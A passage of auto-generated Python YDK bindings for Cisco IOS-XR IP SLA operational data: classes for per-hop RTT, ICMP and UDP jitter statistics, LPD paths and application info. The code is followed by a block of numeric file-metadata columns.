    Hop Index
    **type**\: int
    **range:** \-2147483648..2147483647
    .. attribute:: common_stats
    Common Stats
    **type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats>`
    .. attribute:: specific_stats
    Operation Specific Stats
    **type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats>`
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # List entry keyed by 'hop-index', with two child containers
        # (common-stats and specific-stats).
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop, self).__init__()
        self.yang_name = "hop"              # YANG list name
        self.yang_parent_name = "hops"      # enclosing YANG container
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['hop_index']    # YANG list key leaf
        self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats))])
        self._child_list_classes = OrderedDict([])
        # NOTE: _leafs must be set before the key attribute is assigned below.
        self._leafs = OrderedDict([
            ('hop_index', YLeaf(YType.int32, 'hop-index')),
        ])
        self.hop_index = None               # list key; unset until populated
        # Eagerly instantiate both child containers and link them back.
        self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats()
        self.common_stats.parent = self
        self._children_name_map["common_stats"] = "common-stats"
        self._children_yang_names.add("common-stats")
        self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats()
        self.specific_stats.parent = self
        self._children_name_map["specific_stats"] = "specific-stats"
        self._children_yang_names.add("specific-stats")
        # XPath segment includes the key predicate, e.g. hop[hop-index='1'].
        self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"

    def __setattr__(self, name, value):
        # Route attribute assignment through Entity machinery; only the key
        # leaf 'hop_index' is settable.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop, ['hop_index'], name, value)
class CommonStats(Entity):
    """
    Common Stats: aggregated per-hop common statistics (operational data).

    Leaf attributes (set to None until populated from the device):

    - operation_time: Operation Time. uint64, range 0..18446744073709551615.
    - return_code: Return code (:py:class:`IpslaRetCode
      <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`).
    - response_time_count: Number of RTT samples used for the statistics. uint32.
    - response_time, min_response_time, max_response_time, sum_response_time:
      RTT, minimum RTT, maximum RTT and sum of RTT. uint32, range 0..4294967295.
    - sum2_response_time: Sum of RTT^2. uint64.
    - update_count: Number of updates processed. uint32.
    - ok_count, disconnect_count, timeout_count, busy_count,
      no_connection_count, dropped_count, internal_error_count,
      sequence_error_count, verify_error_count: number of updates with the
      Okay / Disconnected / Timeout / Busy / NotConnected / Dropped /
      InternalError / SeqError / VerifyError return code respectively. uint32.
    """

    # YANG module identity for this generated entity.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats, self).__init__()

        # Position of this container in the YANG data tree.
        self.yang_name = "common-stats"
        self.yang_parent_name = "hop"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # No child containers or lists: this node holds only leafs.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Map of python attribute name -> YANG leaf descriptor.
        self._leafs = OrderedDict([
            ('operation_time', YLeaf(YType.uint64, 'operation-time')),
            ('return_code', YLeaf(YType.enumeration, 'return-code')),
            ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
            ('response_time', YLeaf(YType.uint32, 'response-time')),
            ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
            ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
            ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
            ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
            ('update_count', YLeaf(YType.uint32, 'update-count')),
            ('ok_count', YLeaf(YType.uint32, 'ok-count')),
            ('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
            ('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
            ('busy_count', YLeaf(YType.uint32, 'busy-count')),
            ('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
            ('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
            ('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
            ('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
            ('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
        ])
        # Leaf values start unset; they are filled in when data is read.
        self.operation_time = None
        self.return_code = None
        self.response_time_count = None
        self.response_time = None
        self.min_response_time = None
        self.max_response_time = None
        self.sum_response_time = None
        self.sum2_response_time = None
        self.update_count = None
        self.ok_count = None
        self.disconnect_count = None
        self.timeout_count = None
        self.busy_count = None
        self.no_connection_count = None
        self.dropped_count = None
        self.internal_error_count = None
        self.sequence_error_count = None
        self.verify_error_count = None
        self._segment_path = lambda: "common-stats"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the known leafs.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
    """
    Operation Specific Stats: statistics whose shape depends on the
    operation type.

    Attributes:

    - icmp_path_jitter_stats: child container
      :py:class:`IcmpPathJitterStats`; populated for ICMP path-jitter
      operations.
    - udp_jitter_stats: child container :py:class:`UdpJitterStats`;
      populated for UDP jitter operations.
    - op_type: which operation produced these stats
      (:py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`).
    """

    # YANG module identity for this generated entity.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats, self).__init__()

        # Position of this container in the YANG data tree.
        self.yang_name = "specific-stats"
        self.yang_parent_name = "hop"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Two child containers, one per supported operation type.
        self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('op_type', YLeaf(YType.enumeration, 'op-type')),
        ])
        self.op_type = None

        # Child containers are instantiated eagerly and parented to self.
        self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats()
        self.icmp_path_jitter_stats.parent = self
        self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
        self._children_yang_names.add("icmp-path-jitter-stats")

        self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats()
        self.udp_jitter_stats.parent = self
        self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
        self._children_yang_names.add("udp-jitter-stats")

        self._segment_path = lambda: "specific-stats"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the known leafs.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
    """
    icmp path jitter stats: per-hop statistics of an ICMP path-jitter
    operation (operational data).

    Leaf attributes (set to None until populated from the device):

    - source_address, dest_address, hop_address: IPv4 addresses (dotted-quad
      string pattern) of the probe source, destination and this hop.
    - packet_interval: interval between echos in ms. uint32.
    - response_time_count: number of RTT samples used for the statistics. uint32.
    - response_time, min_response_time, max_response_time, sum_response_time:
      RTT, minimum, maximum and sum of RTT. uint32.
    - sum2_response_time: sum of RTT^2. uint64.
    - packet_count: number of echo replies received. uint32.
    - packet_loss_count, out_of_sequence_count, discarded_sample_count,
      verify_errors_count, dropped_error_count: packets lost / out of
      sequence / discarded samples / data-corruption / dropped. uint32.
    - jitter: jitter value for this node in the path. uint32.
    - pos_jitter_sum, pos_jitter_min, pos_jitter_max, pos_jitter_count:
      sum/min/max/count of positive jitter values. uint32.
    - pos_jitter_sum2: sum of squares of positive jitter values. uint64.
    - neg_jitter_sum, neg_jitter_min, neg_jitter_max, neg_jitter_count:
      sum/min/max/count of negative jitter values. uint32.
    - neg_jitter_sum2: sum of squares of negative jitter values. uint64.
    """

    # YANG module identity for this generated entity.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats, self).__init__()

        # Position of this container in the YANG data tree.
        self.yang_name = "icmp-path-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # No child containers or lists: this node holds only leafs.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Map of python attribute name -> YANG leaf descriptor.
        self._leafs = OrderedDict([
            ('source_address', YLeaf(YType.str, 'source-address')),
            ('dest_address', YLeaf(YType.str, 'dest-address')),
            ('hop_address', YLeaf(YType.str, 'hop-address')),
            ('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
            ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
            ('response_time', YLeaf(YType.uint32, 'response-time')),
            ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
            ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
            ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
            ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
            ('packet_count', YLeaf(YType.uint32, 'packet-count')),
            ('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
            ('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
            ('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
            ('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
            ('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
            ('jitter', YLeaf(YType.uint32, 'jitter')),
            ('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
            ('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
            ('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
            ('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
            ('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
            ('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
            ('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
            ('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
            ('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
            ('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
        ])
        # Leaf values start unset; they are filled in when data is read.
        self.source_address = None
        self.dest_address = None
        self.hop_address = None
        self.packet_interval = None
        self.response_time_count = None
        self.response_time = None
        self.min_response_time = None
        self.max_response_time = None
        self.sum_response_time = None
        self.sum2_response_time = None
        self.packet_count = None
        self.packet_loss_count = None
        self.out_of_sequence_count = None
        self.discarded_sample_count = None
        self.verify_errors_count = None
        self.dropped_error_count = None
        self.jitter = None
        self.pos_jitter_sum = None
        self.pos_jitter_sum2 = None
        self.pos_jitter_min = None
        self.pos_jitter_max = None
        self.pos_jitter_count = None
        self.neg_jitter_sum = None
        self.neg_jitter_min = None
        self.neg_jitter_max = None
        self.neg_jitter_sum2 = None
        self.neg_jitter_count = None
        self._segment_path = lambda: "icmp-path-jitter-stats"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the known leafs.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
    """
    udp jitter stats: per-hop statistics of a UDP jitter operation
    (operational data). SD = source-to-destination direction,
    DS = destination-to-source direction.

    Leaf attributes (set to None until populated from the device;
    counters are uint32 and the *_sum2 squared sums are uint64):

    - jitter_in / jitter_out: input/output jitter moving average,
      computed as per RFC 1889.
    - packet_loss_sd / packet_loss_ds: packets lost per direction.
    - packet_out_of_sequence: packets out of sequence.
    - packet_mia: packets missing in action (direction of loss unknown).
    - packet_skipped, packet_late_arrivals, packet_invalid_tstamp:
      packets skipped / arriving late / with bad timestamps.
    - internal_errors_count, busies_count: internal errors and busies.
    - positive_sd_{sum,sum2,min,max,count} and
      negative_sd_{sum,sum2,min,max,count}: positive/negative jitter value
      aggregates in the SD direction (sums in milliseconds).
    - positive_ds_{sum,sum2,min,max,count} and
      negative_ds_{sum,sum2,min,max,count}: the same aggregates in the
      DS direction (sums in milliseconds).
    - one_way_count: number of probe/probe-response pairs used to compute
      one-way statistics.
    - one_way_sd_{min,max,sum,sum2} and one_way_ds_{min,max,sum,sum2}:
      one-way jitter value aggregates per direction (msec).
    """

    # YANG module identity for this generated entity.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats, self).__init__()

        # Position of this container in the YANG data tree.
        self.yang_name = "udp-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # No child containers or lists: this node holds only leafs.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Map of python attribute name -> YANG leaf descriptor.
        self._leafs = OrderedDict([
            ('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
            ('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
            ('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
            ('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
            ('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
            ('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
            ('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
            ('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
            ('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
            ('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
            ('busies_count', YLeaf(YType.uint32, 'busies-count')),
            ('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
            ('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
            ('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
            ('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
            ('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
            ('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
            ('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
            ('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
            ('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
            ('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
            ('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
            ('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
            ('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
            ('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
            ('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
            ('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
            ('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
            ('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
            ('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
            ('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
            ('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
            ('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
            ('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
            ('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
            ('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
            ('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
            ('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
            ('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
            ('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
        ])
        # Leaf values start unset; they are filled in when data is read.
        self.jitter_in = None
        self.jitter_out = None
        self.packet_loss_sd = None
        self.packet_loss_ds = None
        self.packet_out_of_sequence = None
        self.packet_mia = None
        self.packet_skipped = None
        self.packet_late_arrivals = None
        self.packet_invalid_tstamp = None
        self.internal_errors_count = None
        self.busies_count = None
        self.positive_sd_sum = None
        self.positive_sd_sum2 = None
        self.positive_sd_min = None
        self.positive_sd_max = None
        self.positive_sd_count = None
        self.negative_sd_sum = None
        self.negative_sd_sum2 = None
        self.negative_sd_min = None
        self.negative_sd_max = None
        self.negative_sd_count = None
        self.positive_ds_sum = None
        self.positive_ds_sum2 = None
        self.positive_ds_min = None
        self.positive_ds_max = None
        self.positive_ds_count = None
        self.negative_ds_sum = None
        self.negative_ds_sum2 = None
        self.negative_ds_min = None
        self.negative_ds_max = None
        self.negative_ds_count = None
        self.one_way_count = None
        self.one_way_sd_min = None
        self.one_way_sd_max = None
        self.one_way_sd_sum = None
        self.one_way_sd_sum2 = None
        self.one_way_ds_min = None
        self.one_way_ds_max = None
        self.one_way_ds_sum = None
        self.one_way_ds_sum2 = None
        self._segment_path = lambda: "udp-jitter-stats"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the known leafs.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.Paths.Path.Hops.Hop.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class LpdPaths(Entity):
    """
    List of latest LPD paths.

    Attributes:

    - lpd_path: YList of latest path statistics of the MPLS LSP group
      operation (:py:class:`LpdPath` entries, keyed by path_index).
    """

    # YANG module identity for this generated entity.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths, self).__init__()

        # Position of this container in the YANG data tree.
        self.yang_name = "lpd-paths"
        self.yang_parent_name = "non-distributed"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        # Single child list: "lpd-path" entries.
        self._child_list_classes = OrderedDict([("lpd-path", ("lpd_path", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath))])
        self._leafs = OrderedDict()

        self.lpd_path = YList(self)
        self._segment_path = lambda: "lpd-paths"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation (no leafs here).
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths, [], name, value)
class LpdPath(Entity):
    """
    Latest path statistics of one MPLS LSP group operation path.

    Attributes:

    - path_index (list key): LPD path index. int32
      (range -2147483648..2147483647).
    - path_id: LPD path identifier (child container :py:class:`PathId`).
    - return_code: path return code (:py:class:`IpslaRetCode
      <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`).
    """

    # YANG module identity for this generated entity.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath, self).__init__()

        # Position of this list entry in the YANG data tree.
        self.yang_name = "lpd-path"
        self.yang_parent_name = "lpd-paths"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # path_index is the YANG list key for lpd-path entries.
        self.ylist_key_names = ['path_index']
        self._child_container_classes = OrderedDict([("path-id", ("path_id", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('path_index', YLeaf(YType.int32, 'path-index')),
            ('return_code', YLeaf(YType.enumeration, 'return-code')),
        ])
        self.path_index = None
        self.return_code = None

        # Child container instantiated eagerly and parented to self.
        self.path_id = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId()
        self.path_id.parent = self
        self._children_name_map["path_id"] = "path-id"
        self._children_yang_names.add("path-id")

        # Segment path embeds the list key value.
        self._segment_path = lambda: "lpd-path" + "[path-index='" + str(self.path_index) + "']"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the known leafs.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath, ['path_index', 'return_code'], name, value)
class PathId(Entity):
    """
    LPD path identifier.

    Attributes:

    - lsp_selector: LSP selector. IPv4 dotted-quad string pattern.
    - output_interface: output interface name. String pattern
      [a-zA-Z0-9./-]+.
    - nexthop_address: nexthop address. IPv4 dotted-quad string pattern.
    - downstream_label: downstream label stacks. Leaf-list of uint32
      (range 0..4294967295).
    """

    # YANG module identity for this generated entity.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId, self).__init__()

        # Position of this container in the YANG data tree.
        self.yang_name = "path-id"
        self.yang_parent_name = "lpd-path"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('lsp_selector', YLeaf(YType.str, 'lsp-selector')),
            ('output_interface', YLeaf(YType.str, 'output-interface')),
            ('nexthop_address', YLeaf(YType.str, 'nexthop-address')),
            ('downstream_label', YLeafList(YType.uint32, 'downstream-label')),
        ])
        self.lsp_selector = None
        self.output_interface = None
        self.nexthop_address = None
        # Leaf-list: starts as an empty python list.
        self.downstream_label = []
        self._segment_path = lambda: "path-id"

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the known leafs.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.NonDistributed.LpdPaths.LpdPath.PathId, ['lsp_selector', 'output_interface', 'nexthop_address', 'downstream_label'], name, value)
class ApplicationInfo(Entity):
    """
    IPSLA application information.

    Leaf attributes (set to None / [] until populated from the device):

    - version: version of the IPSLA in Version.Release.Patch-level format. str.
    - max_entries: maximum number of entries. uint32.
    - entries_configured: number of entries configured. uint32.
    - active_entries, pending_entries, inactive_entries: number of
      active / pending / inactive entries. uint32.
    - configurable_probes: number of configurable probes. uint32.
    - min_memory: IPSLA low-memory watermark in KB. uint32.
    - hw_timestamp_disabled: IPSLA HW timestamp Disabled flag. bool.
    - operation_type: operation types available in this IPSLA version;
      leaf-list of :py:class:`SlaOpTypes
      <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.SlaOpTypes>`.
    """

    # YANG module identity for this generated entity.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.ApplicationInfo, self).__init__()

        # Position of this container in the YANG data tree.
        self.yang_name = "application-info"
        self.yang_parent_name = "ipsla"
        self.is_top_level_class = False
        # Direct child of the top-level ipsla container: no list ancestors,
        # so an absolute path can be formed (see below).
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Map of python attribute name -> YANG leaf descriptor.
        self._leafs = OrderedDict([
            ('version', YLeaf(YType.str, 'version')),
            ('max_entries', YLeaf(YType.uint32, 'max-entries')),
            ('entries_configured', YLeaf(YType.uint32, 'entries-configured')),
            ('active_entries', YLeaf(YType.uint32, 'active-entries')),
            ('pending_entries', YLeaf(YType.uint32, 'pending-entries')),
            ('inactive_entries', YLeaf(YType.uint32, 'inactive-entries')),
            ('configurable_probes', YLeaf(YType.uint32, 'configurable-probes')),
            ('min_memory', YLeaf(YType.uint32, 'min-memory')),
            ('hw_timestamp_disabled', YLeaf(YType.boolean, 'hw-timestamp-disabled')),
            ('operation_type', YLeafList(YType.enumeration, 'operation-type')),
        ])
        # Leaf values start unset; they are filled in when data is read.
        self.version = None
        self.max_entries = None
        self.entries_configured = None
        self.active_entries = None
        self.pending_entries = None
        self.inactive_entries = None
        self.configurable_probes = None
        self.min_memory = None
        self.hw_timestamp_disabled = None
        self.operation_type = []
        self._segment_path = lambda: "application-info"
        self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/%s" % self._segment_path()

    def __setattr__(self, name, value):
        # Route attribute writes through YDK validation for the known leafs.
        self._perform_setattr(Ipsla.ApplicationInfo, ['version', 'max_entries', 'entries_configured', 'active_entries', 'pending_entries', 'inactive_entries', 'configurable_probes', 'min_memory', 'hw_timestamp_disabled', 'operation_type'], name, value)
def clone_ptr(self):
    """Create a fresh top-level Ipsla entity, remember it on this
    instance as ``_top_entity``, and return it."""
    top = Ipsla()
    self._top_entity = top
    return top
| 66.893302
| 1,053
| 0.329499
| 52,927
| 875,834
| 5.198934
| 0.011204
| 0.02291
| 0.02996
| 0.03137
| 0.952843
| 0.932749
| 0.905438
| 0.888125
| 0.87872
| 0.866658
| 0
| 0.041522
| 0.600898
| 875,834
| 13,092
| 1,054
| 66.898411
| 0.745679
| 0.187952
| 0
| 0.802074
| 0
| 0.001353
| 0.126673
| 0.021248
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057259
| false
| 0
| 0.001127
| 0
| 0.11587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d3b69e8cb26ebf814af4590bd2d7166bc2629180
| 67,399
|
py
|
Python
|
fsmpy/tests/test_similarities.py
|
GCidd/fsmpy
|
131e81925481b3fe608f2c1945bbb00a8b674e72
|
